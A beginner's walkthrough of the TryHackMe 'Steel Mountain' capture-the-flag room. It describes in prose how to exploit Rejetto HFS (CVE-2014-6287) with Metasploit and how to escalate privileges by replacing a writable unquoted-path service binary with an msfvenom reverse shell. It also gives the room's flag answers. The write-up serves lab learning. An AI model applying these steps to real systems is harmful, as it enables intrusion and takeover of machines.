TryHackMe — Steel Mountain | CTF | Beginner Friendly Walkthrough

Hello, this is Nithin here. I’m a security researcher / enthusiast and I go by the handle @thebinarybot at most of the places online.

Steel Mountain is a CTF at TryHackMe which is based on the popular TV series Mr.Robot and is a Windows themed room. It’s quite an easy CTF and here’s a write-up on how I solved this.

1. Deploy the Machine

Q1. Who is the employee of the month?

First, let’s do a basic Nmap scan.

There’s quite a bunch of open ports. Upon visiting port 80, I got this.

But the name isn’t available. So I opened the image in new tab and the name of the employee was there in the URL.

Ans : Bill Harper

2. Initial Access

Q1. Scan the machine with nmap. What is the other port running a web server on?

Having completed the scan previously, I knew port 8080’s service is HTTP.

Ans : 8080

Q2. Take a look at the other web server. What file server is running?

Connecting to IP:8080 and hovering over the HttpFileServer link, I was able to see that it’s pointing to rejetto.com

Ans : Rejetto Http File Server

Q3. What is the CVE number to exploit this file server?

From the Nmap scan, I came to know that the HttpFileServer version is 2.3. Hence, looking up for the same in Exploit-DB, I got this.

Ans : 2014–6287

Q4. Use Metasploit to get an initial shell. What is the user flag?

Launching Metasploit and then searching for the CVE.

Setting necessary options and running the exploit.

But upon running exploit for the first time, I wasn’t able to create a session.

Then I made sure to set LHOST also to the same IP as that of SRVHOST and it worked and gave me a meterpreter shell.

Checking bill’s directory,

Checking bill’s desktop and obtaining the flag.

Ans : b04763b6fcf51fcd7c13abc7db4fd365

3. Privilege Escalation

Uploading the PowerUp.ps1 script and loading powershell,

Find PowerUp.ps1 script here

Running PowerUp.ps1,

Q1. Take close attention to the CanRestart option that is set to true. What is the name of the service which shows up as an unquoted service path vulnerability?

Ans : AdvancedSystemCareService9

Q2. What is the root flag?

Since we have a CanRestart set to True, I tried to restart the service, upload a malicious binary instead of the legitimate one and obtain root. (Could do this since the directory of the application is write-able)

Using msfvenom to create a reverse shell,

Then, I uploaded by executable.

Now, starting Handler as a background job.

Now, restart AdvancedSystemCareService9 using sc stop/start AdvancedSystemCare9 and then background the current session, connect to the elevated session and obtain the flag.